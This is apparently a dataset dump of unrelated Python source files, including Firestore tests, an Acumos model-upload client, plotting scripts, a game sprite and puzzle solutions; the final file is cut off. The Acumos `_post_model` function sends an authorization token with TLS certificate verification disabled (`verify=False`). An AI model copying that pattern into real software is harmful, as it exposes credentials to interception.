transaction._options_protobuf(None)\n expected_pb = common.TransactionOptions(\n read_only=common.TransactionOptions.ReadOnly()\n )\n self.assertEqual(options_pb, expected_pb)\n\n def test__options_protobuf_read_only_retry(self):\n from google.cloud.firestore_v1.base_transaction import _CANT_RETRY_READ_ONLY\n\n transaction = self._make_one(read_only=True)\n retry_id = b\"illuminate\"\n\n with self.assertRaises(ValueError) as exc_info:\n transaction._options_protobuf(retry_id)\n\n self.assertEqual(exc_info.exception.args, (_CANT_RETRY_READ_ONLY,))\n\n def test__options_protobuf_read_write(self):\n transaction = self._make_one()\n options_pb = transaction._options_protobuf(None)\n self.assertIsNone(options_pb)\n\n def test__options_protobuf_on_retry(self):\n from google.cloud.firestore_v1.types import common\n\n transaction = self._make_one()\n retry_id = b\"hocus-pocus\"\n options_pb = transaction._options_protobuf(retry_id)\n expected_pb = common.TransactionOptions(\n read_write=common.TransactionOptions.ReadWrite(retry_transaction=retry_id)\n )\n self.assertEqual(options_pb, expected_pb)\n\n def test_in_progress_property(self):\n transaction = self._make_one()\n self.assertFalse(transaction.in_progress)\n transaction._id = b\"not-none-bites\"\n self.assertTrue(transaction.in_progress)\n\n def test_id_property(self):\n transaction = self._make_one()\n 
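# mock.sentinel attributes are unique named singletons, so assertIs can verify the exact object round-trips\n 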
transaction._id = mock.sentinel.eye_dee\n self.assertIs(transaction.id, mock.sentinel.eye_dee)\n\n\nclass Test_Transactional(unittest.TestCase):\n @staticmethod\n def _get_target_class():\n from google.cloud.firestore_v1.base_transaction import _BaseTransactional\n\n return _BaseTransactional\n\n def _make_one(self, *args, **kwargs):\n klass = self._get_target_class()\n return klass(*args, **kwargs)\n\n def test_constructor(self):\n wrapped = self._make_one(mock.sentinel.callable_)\n self.assertIs(wrapped.to_wrap, mock.sentinel.callable_)\n self.assertIsNone(wrapped.current_id)\n self.assertIsNone(wrapped.retry_id)\n\n def test__reset(self):\n wrapped = self._make_one(mock.sentinel.callable_)\n wrapped.current_id = b\"not-none\"\n wrapped.retry_id = b\"also-not\"\n\n ret_val = wrapped._reset()\n self.assertIsNone(ret_val)\n\n self.assertIsNone(wrapped.current_id)\n self.assertIsNone(wrapped.retry_id)\n","sub_path":"tests/unit/v1/test_base_transaction.py","file_name":"test_base_transaction.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"424277358","text":"# -*- coding: utf-8 -*-\n# ===============LICENSE_START=======================================================\n# Acumos Apache-2.0\n# ===================================================================================\n# Copyright (C) 2017-2018 AT&T Intellectual Property & Tech Mahindra. All rights reserved.\n# ===================================================================================\n# This Acumos software file is distributed by AT&T and Tech Mahindra\n# under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# This file is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============LICENSE_END=========================================================\n\"\"\"\nProvides a Acumos session for pushing and dumping models\n\"\"\"\nimport random\nimport string\nimport shutil\nimport json\nimport requests\nimport fnmatch\nimport warnings\nfrom contextlib import contextmanager, ExitStack\nfrom tempfile import TemporaryDirectory\nfrom os import walk, mkdir\nfrom os.path import extsep, exists, abspath, dirname, isdir, isfile, expanduser, relpath, basename, join as path_join\nfrom pathlib import Path\nfrom collections import namedtuple\nfrom glob import glob\n\nfrom acumos_cpp.metadata import Options\nfrom acumos_cpp.utils import dump_artifact\nfrom acumos_cpp.exc import AcumosError\nfrom acumos_cpp.logging import get_logger\nfrom acumos_cpp.auth import get_jwt, clear_jwt\n\nlogger = get_logger(__name__)\n\n_LICENSE_NAME = 'license.json'\n_PYEXT = \"{}py\".format(extsep)\n_PYGLOB = \"*{}\".format(_PYEXT)\n\n_ServerResponse = namedtuple('ServerResponse', 'status_code reason text')\n_DEPR_MSG = ('Usage of `auth_api` is deprecated; provide an onboarding token instead. 
'\n 'See https://pypi.org/project/acumos/ for more information.')\n\n\nclass AcumosSession(object):\n '''\n A session that enables onboarding models to Acumos\n\n Parameters\n ----------\n push_api : str\n The full URL to the Acumos onboarding server upload API\n auth_api : str\n The full URL to the Acumos onboarding server authentication API.\n\n .. deprecated:: 0.7.1\n Users should provide an onboarding token instead of username and password credentials.\n '''\n\n def __init__(self, push_api=None, auth_api=None):\n self.push_api = push_api\n self.auth_api = auth_api\n\n if auth_api is not None:\n warnings.warn(_DEPR_MSG, DeprecationWarning, stacklevel=2)\n\n\ndef _validate_options(options):\n '''Validates and returns an `Options` object'''\n if options is None:\n options = Options()\n elif not isinstance(options, Options):\n raise AcumosError('The `options` parameter must be of type `acumos.metadata.Options`')\n return options\n\n\ndef _assert_valid_api(param, api, required):\n '''Raises AcumosError if an api is invalid'''\n if api is None:\n if required:\n raise AcumosError(\"AcumosSession.push requires that the API for `{}` be provided\".format(param))\n else:\n if not api.startswith('https'):\n logger.warning(\n \"Provided `{}` API {} does not begin with 'https'. Your password and token are visible in plaintext!\".format(\n param, api))\n\n\ndef _push_model(dump_dir, push_api, auth_api, options, max_tries=2, extra_headers=None):\n '''Pushes a model to the Acumos server'''\n with ExitStack() as stack:\n model = stack.enter_context(open(path_join(dump_dir, 'model.zip'), 'rb'))\n meta = stack.enter_context(open(path_join(dump_dir, 'metadata.json')))\n proto = stack.enter_context(open(path_join(dump_dir, 'model.proto')))\n\n files = {'model': ('model.zip', model, 'application/zip'),\n 'metadata': ('metadata.json', meta, 'application/json'),\n 'schema': ('model.proto', proto, 'text/plain')}\n\n # include a license if one is provided\n if options.license is not None:\n _add_license(dump_dir, options.license)\n license = stack.enter_context(open(path_join(dump_dir, _LICENSE_NAME)))\n files['license'] = (_LICENSE_NAME, license, 'application/json')\n\n tries = 1\n _post_model(files, push_api, auth_api, tries, max_tries, extra_headers, options)\n\n\ndef _add_license(rootdir, license_str):\n '''Adds a license file to the model root directory'''\n license_dst = path_join(rootdir, _LICENSE_NAME)\n if isfile(license_str):\n shutil.copy(license_str, license_dst)\n else:\n license_dict = {'license': license_str} # the license team hasn't defined a license schema yet\n dump_artifact(license_dst, data=license_dict, module=json, mode='w')\n\n\ndef _post_model(files, push_api, auth_api, tries, max_tries, extra_headers, options):\n '''Attempts to post the model to Acumos'''\n headers = {'Authorization': get_jwt(auth_api),\n 'isCreateMicroservice': 'true' if options.create_microservice else 'false',\n 'deploy': 'true' if options.deploy else 'false'}\n if extra_headers is not None:\n headers.update(extra_headers)\n\n resp = requests.post(push_api, files=files, headers=headers, verify=False)\n\n if resp.ok:\n response = resp.json()\n try:\n if options.create_microservice:\n logger.info(\"Model pushed successfully to {} model URI {} \".format(push_api, response['dockerImageUri']))\n else:\n logger.info(\"Model pushed successfully to {} \".format(push_api))\n except KeyError:\n logger.info(\"Model pushed successfully to {} \".format(push_api))\n else:\n clear_jwt()\n if resp.status_code == 401 and tries != 
max_tries:\n logger.warning('Model push failed due to an authorization failure. Clearing credentials and trying again')\n _post_model(files, push_api, auth_api, tries + 1, max_tries, extra_headers, options)\n else:\n raise AcumosError(\"Model push failed: {}\".format(_ServerResponse(resp.status_code, resp.reason, resp.text)))\n","sub_path":"acumos_cpp/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"143834587","text":"from math import ceil, log2\n\ndef clever(x):\n ans = 2**ceil(log2(x)) - x - 1\n if not (x & (x - 1)):\n ans += x\n return ans\n\nfor case in range(int(input())):\n print(clever(int(input())))\n","sub_path":"competitions/weekofcode28/great_xor.py","file_name":"great_xor.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"578052069","text":"import inspect\nimport logging\nimport os\n\nimport tmdbsimple as tmdb\n\nfrom adapters.cinema_city import theatres as cc_theatres\nfrom adapters.common import TheatreAdapter\nfrom adapters.yes_planet import theatres as yp_theatres\n\nDEBUG = True\n\nAdapterBaseClass = TheatreAdapter\n# Disable requests and urllib3 logging\nlogging.getLogger(\"requests\").setLevel(logging.WARNING)\nlogging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n\nstream_handler = logging.StreamHandler()\nlogging_format = \"%(asctime)s [%(levelname)s] [%(name)s] [%(funcName)s] - %(message)s\"\n\nlogging.basicConfig(\n handlers=[stream_handler],\n format=logging_format,\n level=logging.DEBUG if DEBUG else logging.INFO,\n)\ncc_adapters = []\nfor name, adapter in inspect.getmembers(cc_theatres, inspect.isclass):\n if adapter.__module__ == cc_theatres.__name__:\n if issubclass(adapter, AdapterBaseClass):\n cc_adapters.append(adapter())\n\nyp_adapters = []\nfor name, adapter in inspect.getmembers(yp_theatres, inspect.isclass):\n if adapter.__module__ == yp_theatres.__name__:\n if issubclass(adapter, AdapterBaseClass):\n yp_adapters.append(adapter())\n\nadapters = cc_adapters + yp_adapters\n\nTMDB_API_KEY = os.getenv(\"TMDB_API_KEY\", None)\ntmdb.API_KEY = TMDB_API_KEY\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"562757673","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.arange(0, 2*np.pi, 0.1)\ny = np.sin(x)\nz = np.cos(x)\nt = np.tan(x)\n\nplt.plot(x,y,x,z,x,t)\nplt.xlim(0, 10)\nplt.ylim(-1.5, 1.5)\nplt.xlabel('x from 0 to 2*pi', fontsize = 12)\nplt.ylabel('Sin and Cos', fontsize = 12)\nplt.legend(['Sin', 'Cos', 'Tan'], loc = \"upper right\", frameon = False, fontsize = 10)\nplt.title('Assignment 1', loc='left', fontsize = 20)\nplt.show()\n","sub_path":"NewAssignment1.py","file_name":"NewAssignment1.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"62999162","text":"# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button, TextBox, RadioButtons\n\nfrom utils import *\n\nclass GUI():\n def __init__(self):\n self.axcolor = 'lightgrey'\n self.fig = plt.figure(figsize=(8, 6))\n self.updating_status = False\n self.main()\n \n def main(self):\n self.calc_infos()\n self.init_figure()\n self.init_control_zone()\n 
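# lay out the static results panel before wiring up the widget callbacks\n 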
self.init_result_zone()\n self.add_events()\n plt.show()\n\n def calc_infos(self, algorithm=0):\n self.t_r2, self.s, self.Q, self.x_bias, self.y_bias, self.RMSE, self.W_p, self.rac_u_p, self.s_p, self.t_r2_p, self.T, self.S = run_AutoFit(algorithm)\n \n def init_figure(self):\n ######## Plot Zone ########\n ax = self.fig.add_subplot(1,1,1)\n plt.subplots_adjust(bottom=0.42, left=0.18, right=0.65)\n\n rec_u, W_std = W_u_std(1e-8, 10, 0.01)\n self.l, = plt.plot(self.t_r2+self.x_bias, self.s+self.y_bias, 's', color='maroon',\n markersize=5, label='measurement data')\n plt.plot(rec_u, W_std, color='k',\n linewidth=0.85, label='theis type-curve')\n plt.xlabel(r'lg$(\\frac{1}{u})$ ', fontsize=10)\n plt.ylabel(r'lg$(W)$', fontsize=10)\n plt.xlim(np.min(self.t_r2+self.x_bias)-1, np.max(self.t_r2+self.x_bias)+1)\n plt.ylim(np.min(self.s+self.y_bias)-1, np.max(self.s+self.y_bias)+0.5)\n plt.grid(True, ls='--', lw=.5, c='k', alpha=0.6)\n plt.legend(fontsize=8)\n plt.suptitle(\"Theis Type-curve Fitting\")\n\n def init_control_zone(self):\n ######## Control Zone ########\n contrl_ax = plt.axes([0.05, 0.05, 0.90, 0.27])\n plt.text(0.035, 0.85, 'Control Zone')\n contrl_ax.set_xticks([])\n contrl_ax.set_yticks([])\n\n # slider\n ax_xbias = plt.axes([0.14, 0.21, 0.35, 0.03], facecolor=self.axcolor)\n ax_ybias = plt.axes([0.14, 0.16, 0.35, 0.03], facecolor=self.axcolor)\n\n self.s_xbias = Slider(ax_xbias, 'x_bias', 0.0, 5, valinit=self.x_bias)\n self.s_ybias = Slider(ax_ybias, 'y_bias', 0.0, 5, valinit=self.y_bias)\n\n # buttons\n aftax = plt.axes([0.8, 0.06, 0.1, 0.04])\n self.reset_button = Button(aftax, 'RESET', color=self.axcolor, hovercolor='mistyrose')\n\n x_bias_dec_tax = plt.axes([0.57, 0.21, 0.03, 0.03])\n self.x_bias_dec_button = Button(x_bias_dec_tax, '-', color=self.axcolor, hovercolor='mistyrose')\n\n x_bias_inc_tax = plt.axes([0.72, 0.21, 0.03, 0.03])\n self.x_bias_inc_button = Button(x_bias_inc_tax, '+', color=self.axcolor, hovercolor='mistyrose')\n\n y_bias_dec_tax = plt.axes([0.57, 0.16, 0.03, 0.03])\n self.y_bias_dec_button = Button(y_bias_dec_tax, '-', color=self.axcolor, hovercolor='mistyrose')\n\n y_bias_inc_tax = plt.axes([0.72, 0.16, 0.03, 0.03])\n self.y_bias_inc_button = Button(y_bias_inc_tax, '+', color=self.axcolor, hovercolor='mistyrose')\n\n # textbox\n xtextax = plt.axes([0.61, 0.21, 0.1, 0.03])\n ytextax = plt.axes([0.61, 0.16, 0.1, 0.03])\n self.t_xbias = TextBox(xtextax, ' ', str(float('%.2f' %self.x_bias)))\n self.t_ybias = TextBox(ytextax, ' ', str(float('%.2f' %self.y_bias)))\n\n # radio button\n rax = plt.axes([0.78, 0.12, 0.15, 0.17], facecolor=self.axcolor)\n plt.title('AutoFit Algorithms', fontsize=8)\n self.algos = np.array(['Traverse', 'Mass Center', 'Slope'])\n self.radio = RadioButtons(rax, self.algos, active=0)\n\n def init_result_zone(self, ):\n ######## Result Zone ########\n re_ax = plt.axes([0.70, 0.37, 0.20, 0.50])\n plt.text(0.035, 0.95, 'Results Zone')\n re_ax.set_xticks([])\n re_ax.set_yticks([])\n\n self.W_l = plt.text(0.2, 0.85, r'$W: %.2f $' %(self.W_p))\n self.u_l = plt.text(0.2, 0.75, r'$1/u: %.2f $' %(self.rac_u_p))\n self.s_l = plt.text(0.2, 0.65, r'$s: %.2f $' %(self.s_p))\n self.tr2_l = plt.text(0.2, 0.55, r'$t/r^2: %.4f $' %(self.t_r2_p))\n self.T_l = plt.text(0.2, 0.45, r'$T: %.2f m^3/d$' %(self.T))\n self.S_l = plt.text(0.2, 0.35, r'$S: %.6f $' %(self.S))\n plt.text(0.035, 0.2, 'Statistics of Fitting')\n self.RMSE_l = plt.text(0.2, 0.1, r'$RMSE: %.4f$' %(self.RMSE))\n\n def add_events(self):\n self.s_xbias.on_changed(self.update_x)\n 
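# the y-bias slider funnels into the same guarded update path as the x-bias slider\n 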
self.s_ybias.on_changed(self.update_y)\n self.reset_button.on_clicked(self.reset)\n self.x_bias_dec_button.on_clicked(self.dec_x_bias)\n self.x_bias_inc_button.on_clicked(self.inc_x_bias)\n self.y_bias_dec_button.on_clicked(self.dec_y_bias)\n self.y_bias_inc_button.on_clicked(self.inc_y_bias)\n self.t_xbias.on_submit(self.submit_x)\n self.t_ybias.on_submit(self.submit_y)\n self.radio.on_clicked(self.chg_algorithm)\n\n def chg_result(self, t_r2, s, x_bias, y_bias):\n \"\"\" change the results in the results zone \"\"\"\n self.W_p, self.rac_u_p, self.s_p, self.t_r2_p, self.T, self.S = calResult(self.t_r2, self.s, self.Q, self.x_bias, self.y_bias, num=2)\n self.W_bias = (W(1/(10**(t_r2+float('%.2f' %x_bias)))))\n self.RMSE = np.sqrt(np.mean((self.W_bias - 10**(s+float('%.2f' %y_bias))) ** 2))\n\n self.W_l.set_text(r'$W: %.2f $' %(self.W_p))\n self.u_l.set_text(r'$1/u: %.2f $' %(self.rac_u_p))\n self.s_l.set_text(r'$s: %.2f $' %(self.s_p))\n self.tr2_l.set_text(r'$t/r^2: %.4f $' %(self.t_r2_p))\n self.T_l.set_text(r'$T: %.2f m^3/d$' %(self.T))\n self.S_l.set_text(r'$S: %.6f $' %(self.S))\n self.RMSE_l.set_text(r'$RMSE: %.4f$' %(self.RMSE))\n\n\n\n def update_x(self, x_bias):\n \"\"\"update all widgets with new x_bias\"\"\"\n # debounce\n if self.updating_status:\n return \n\n x_bias = float('%.2f' %x_bias)\n if x_bias == self.x_bias:\n return\n\n self.updating_status = True\n self.x_bias = x_bias\n self.s_xbias.set_val(float('%.2f' %self.x_bias))\n self.t_xbias.set_val(float('%.2f' %self.x_bias))\n self.l.set_xdata(self.t_r2+self.x_bias)\n\n self.fig.canvas.draw_idle()\n self.chg_result(self.t_r2, self.s, self.x_bias, self.y_bias)\n self.updating_status = False\n\n def update_y(self, y_bias):\n \"\"\"update all widgets with new y_bias\"\"\"\n # debounce\n if self.updating_status:\n return \n\n y_bias = float('%.2f' %y_bias)\n if y_bias == self.y_bias:\n return\n\n self.updating_status = True\n self.y_bias = y_bias\n self.s_ybias.set_val(float('%.2f' %self.y_bias))\n self.t_ybias.set_val(float('%.2f' %self.y_bias))\n self.l.set_ydata(self.s+self.y_bias)\n\n self.fig.canvas.draw_idle()\n self.chg_result(self.t_r2, self.s, self.x_bias, self.y_bias)\n self.updating_status = False\n\n def reset(self, event):\n \"\"\" reset the figure \"\"\"\n self.radio.set_active(0)\n\n def dec_x_bias(self, event):\n \"\"\" decrease the x_bias using '-' button \"\"\"\n self.update_x(self.x_bias-0.01)\n\n def inc_x_bias(self, event):\n \"\"\" increase the x_bias using '+' button \"\"\"\n self.update_x(self.x_bias+0.01)\n\n def dec_y_bias(self, event):\n \"\"\" decrease the y_bias using '-' button \"\"\"\n self.update_y(self.y_bias-0.01)\n\n def inc_y_bias(self, event):\n \"\"\" increase the y_bias using '+' button \"\"\"\n self.update_y(self.y_bias+0.01)\n\n def submit_x(self, text):\n \"\"\" updates the figure using textbox (x_bias)\"\"\"\n self.update_x(float(text))\n\n def submit_y(self, text):\n \"\"\" updates the figure using textbox (y_bias)\"\"\"\n self.update_y(float(text))\n\n def chg_algorithm(self, label):\n algorithm = np.argwhere(self.algos==label)[0][0]\n # t_r2, s, Q, x_bias, y_bias, RMSE, W_p, rac_u_p, s_p, t_r2_p, T, S = run_AutoFit(algorithm)\n self.calc_infos(algorithm)\n self.update_x(self.x_bias)\n self.update_y(self.y_bias)\n\n\n\n\n","sub_path":"src/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":8031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"296409592","text":"import pygame\nfrom pistol import Pistol\nimport random\n\n\nclass 
Enemy(pygame.sprite.Sprite):\n \"\"\"The enemy is automated\n \n Attributes:\n left (int): the far left of the platform the enemy is on\n right (int): the far right of the platform the enemy is on\n shift_x (int): speed in x direction.\n image(surface): image to be played on the main surface\n rect(pygame.rect): Rectangle of the image\n index(int): the current index for which of the images to blit\n shot_list(list(Pistol)): a list of pistol objects\n is_shoot(boolean): whether the enemy is shooting\n generated_shot(int): The restriction on how fast the enemy shoots\n cal(int): counter used to calculate the next shot\n melee(boolean): whether the player can only perform melee attacks\n \"\"\"\n \n def __init__(self, left, right, screen):\n self.screen = screen\n super().__init__()\n self.list = self.__create_run_list()\n self.image = self.list[0]\n self.rect = self.list[0].get_rect()\n self.left = left \n # where the enemy will spawn\n self.rect.x = left \n self.right = right \n self.shift_x = -2\n self.index = 0\n self.is_shoot = False\n self.shot_list = []\n self.cal = 0\n self.melee = False\n self.generated_shot = random.randint(100, 200)\n \n def __create_run_list(self): \n list = []\n for i in range(0,8):\n image = pygame.image.load(\"images/Run (\"+ str(i + 1) +\").png\")\n image = pygame.transform.scale(image, (100,100))\n list.insert(i, image)\n image = pygame.transform.flip(image, True, False)\n list.insert(i+8, image)\n for i in range(0,4):\n image = pygame.image.load(\"images/Shoot (\"+ str(i + 1) +\").png\")\n image = pygame.transform.scale(image, (100,100))\n list.insert(i+15, image)\n image = pygame.transform.flip(image, True, False)\n list.insert(i+19, image)\n return list \n \n def walk(self, left, right, y):\n \"\"\" The automated walking for the AI\n \n Args:\n left(int): the left x coordinate of the walk restrictions\n right(int): the right x coordinate of the walk restriction\n y(int): the bottom y coordinate of the placement\n \n \"\"\"\n def die(self):\n \"\"\" Play the death sound \"\"\"\n death_sound = pygame.mixer.Sound('sound/Scream_And_Die_Fx-SoundBible.ogg')\n death_sound.set_volume(.35)\n death_sound.play()\n \n def __end(self):\n \"\"\" change the direction of the AI if it has reached the edge \"\"\"\n #print('called')\n if self.rect.x <= self.left - 15:\n #print('called2')\n self.shift_x = 2\n self.index = 0\n elif self.rect.right >= self.right + 15:\n self.index = 9\n self.shift_x = -2\n \n def __shoot(self, left):\n if left:\n pistol = Pistol(self.screen,self.rect.x-50, self.rect.y-50, True)\n pistol.shift_x = -5\n self.shot_list.append(pistol)\n else:\n pistol = Pistol(self.screen,self.rect.x-50, self.rect.y-50, False)\n pistol.shift_x = 5\n self.shot_list.append(pistol)\n \n def __draw_bullet(self):\n for bullet in self.shot_list:\n bullet.update()\n \n def draw(self, screen):\n \"\"\" Draw the enemy on the main surface. This will also update the bullet\n in the game so it can be drawn in the main surface\n \n Args:\n screen(Surface) main screen for which the game will be played\n \"\"\"\n self.screen = screen\n #blit the screen\n screen.blit(self.list[self.index], (self.rect.x, self.rect.y))\n #update and draw the bullets\n for bullet in self.shot_list:\n bullet.update() \n \n def update(self):\n \"\"\" Update the enemy and all the info. 
\"\"\"\n #enemy as at the end of the platform\n self.__end()\n \n self.rect.x += self.shift_x\n self.image = self.list[self.index]\n\n self.__draw_bullet()\n \n #if the enemy is not in melee begin calcuations for generated shot\n if not self.melee:\n self.cal +=1\n else:\n self.cal = 1\n \n ################Handling of the index################################\n #end of run list\n if self.index == 7:\n self.index = 0\n elif self.index == 14:\n self.index = 8\n elif self.index == 18:\n #start running to the right\n self.shift_x = 2\n self.index = 0\n elif self.index == 22:\n #start running to the left\n self.shift_x = -2\n self.index = 8\n else:\n self.index += 1\n #######################################################################\n \n #if teh player is facing left\n if self.rect.x < 1000 and self.cal % self.generated_shot == 0 and\\\n 7< self.index < 14: \n self.shift_x = 0\n self.index = 19\n self.__shoot(True)\n #if the player is facing the right\n elif self.rect.x < 1000 and self.cal % self.generated_shot ==0 and\\\n 0 < self.index < 8: \n self.shift_x = 0\n self.index = 15\n self.__shoot(False)\n \n\n","sub_path":"rasecgame/rasaec/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":5595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"320634397","text":"t = int(input())\nfor index in range(t):\n l = input().split(\" \")\n len = int(l[0])\n k = int(l[1])\n numbers = input().split(\" \")\n startPoint = 0\n while startPoint < len:\n endPoint = min(startPoint+k, len)\n while endPoint > startPoint + 1:\n for i in range(startPoint, endPoint-1):\n if int(numbers[i]) < int(numbers[i+1]):\n temp = numbers[i+1]\n numbers[i+1] = numbers[i]\n numbers[i] = temp\n endPoint -=1\n startPoint += k\n for i in range(len):\n if i == len-1:\n print(numbers[i], end=\" \\n\")\n else:\n print(numbers[i], end=\" \")\n","sub_path":"Code/CodeRecords/2342/60619/237909.py","file_name":"237909.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"266035449","text":"#!/usr/bin/env python\n\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport sys\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser(description='performance info scatter')\nparser.add_argument('filepath', nargs='?')\nargs = parser.parse_args()\n\nfilepath = args.filepath or sys.stdin\n\ndf = pd.read_csv(filepath, index_col='time')\npca = PCA(n_components=2)\n\ncoords = pca.fit_transform(df.transpose())\nx = [v[0] for v in coords]\ny = [v[1] for v in coords]\n\nplt.scatter(x, y)\n\nfor i, txt in enumerate(df.columns):\n plt.annotate(txt, (x[i], y[i]))\n\nplt.show()\n\n","sub_path":"samples/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"592422590","text":"import sys\nfrom struct import unpack\nfrom PIL import Image, ImageDraw\n\nassert(len(sys.argv) == 3)\nimage_path = str(sys.argv[1])\nres_path = str(sys.argv[2])\n\nimg = Image.open(image_path)\nboxes = []\nwith open(res_path, 'rb') as f:\n data = f.read()\n for i in range(len(data) / 4):\n boxes.append(unpack('f', data[i * 4 : i * 4 + 4])[0] * max(img.size[0], img.size[1]))\n\ndraw = ImageDraw.Draw(img)\nfor i in range(len(boxes) / 4):\n draw.rectangle([boxes[i * 4 + 1], boxes[i * 4 + 0], boxes[i * 4 + 3], boxes[i * 4 + 2]], outline=(255, 0, 
0))\n\nimg.show()\n","sub_path":"workspace/det/tf_coreml_utils/frcnn_tf2coreml_zcr/coreml-py/vis_result.py","file_name":"vis_result.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"310842344","text":"#-*- coding:utf-8 -*-\n# ==============================================================================\n# Copyright 2016 Windy Darian (Ruoyu Fan)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n'''\nCreated on March 19, 2016\nhttps://leetcode.com/problems/reconstruct-itinerary/\n@author: Windy Darian (Ruoyu Fan)\n'''\n\n# Note: I should have used Hierholzer's algorithm for the Eulerian path but...\n\n\nfrom bisect import insort_left\n\n\nclass Solution(object):\n def add_tickets(self, tickets):\n # type: list[[str,str]] -> None\n \"\"\"\n add tickets to the tickets to choose from.\n used in initialization and putting tickets back when find a wrong\n itinerary\n \"\"\"\n for ticket in tickets:\n if ticket[0] not in self.ticket_dict:\n self.ticket_dict[ticket[0]] = [ticket]\n else:\n # always insert in order so the result is always of a smaller\n # lexical order\n insort_left(self.ticket_dict[ticket[0]], ticket)\n\n def search_itinerary(self, from_key):\n # type: str -> list[[str, str]]\n \"\"\"\n given a starting airport, recursively return a valid itinerary that uses\n up all tickets\n \"\"\"\n tickets_from_key = self.ticket_dict.get(from_key)\n if not tickets_from_key:\n return []\n\n from_index = 0\n while True:\n current_ticket = tickets_from_key.pop(from_index)\n results = [current_ticket]\n results.extend(self.search_itinerary(current_ticket[1]))\n if not tickets_from_key:\n return results\n # else\n # if there are tickets left, it is not a valid itinerary, return\n # all the tickets to the ticket_dict and begin another search\n self.add_tickets(results)\n from_index = from_index + 1\n\n\n def findItinerary(self, tickets):\n # LeetCode solution entry\n \"\"\"\n :type tickets: List[List[str]]\n :rtype: List[str]\n \"\"\"\n self.ticket_dict = {}\n self.add_tickets(tickets)\n tickets_route = self.search_itinerary(\"JFK\")\n\n if not tickets_route:\n return []\n\n result = [tickets_route[0][0]]\n for ticket in tickets_route:\n result.append(ticket[1])\n\n return result\n","sub_path":"leetcode/_332_reconstruct_itinerary.py","file_name":"_332_reconstruct_itinerary.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"134330366","text":"# -*- coding: utf-8 -*-\n#\n#\n# TheVirtualBrain-Framework Package. This package holds all Data Management, and \n# Web-UI helpful to run brain-simulations. To use it, you also need do download\n# TheVirtualBrain-Scientific Package (for simulators). See content of the\n# documentation-folder for more details. 
See also http://www.thevirtualbrain.org\n#\n# (c) 2012-2013, Baycrest Centre for Geriatric Care (\"Baycrest\")\n#\n# This program is free software; you can redistribute it and/or modify it under \n# the terms of the GNU General Public License version 2 as published by the Free\n# Software Foundation. This program is distributed in the hope that it will be\n# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of \n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public\n# License for more details. You should have received a copy of the GNU General \n# Public License along with this program; if not, you can download it here\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0\n#\n#\n# CITATION:\n# When using The Virtual Brain for scientific publications, please cite it as follows:\n#\n# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,\n# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)\n# The Virtual Brain: a simulator of primate brain network dynamics.\n# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)\n#\n#\n\"\"\"\n.. moduleauthor:: Ionel Ortelecan \n.. moduleauthor:: Lia Domide \n\"\"\"\nimport numpy\nimport pylab\nfrom scipy.optimize import leastsq\nfrom matplotlib.mlab import griddata\nfrom matplotlib import colors\nfrom tvb.core.adapters.abcdisplayer import ABCMPLH5Displayer\nfrom tvb.datatypes.graph import ConnectivityMeasure\nfrom tvb.basic.filters.chain import FilterChain\n\n\n\nclass BaseTopography():\n \"\"\"\n Base class for topographic visualizers.\n \"\"\"\n # the following fields aren't changed from GUI\n plotsensors = False\n plothead = True\n masked = True\n # this field may be modified from the GUI\n plot_contours = False\n\n # dictionaries that contains processed data\n head_contour = None\n sensor_locations = None\n topography_data = None\n\n\n def get_required_memory_size(self, **kwargs):\n \"\"\"\n Return the required memory to run this algorithm.\n \"\"\"\n # Don't know how much memory is needed.\n return -1\n\n\n def init_topography(self, 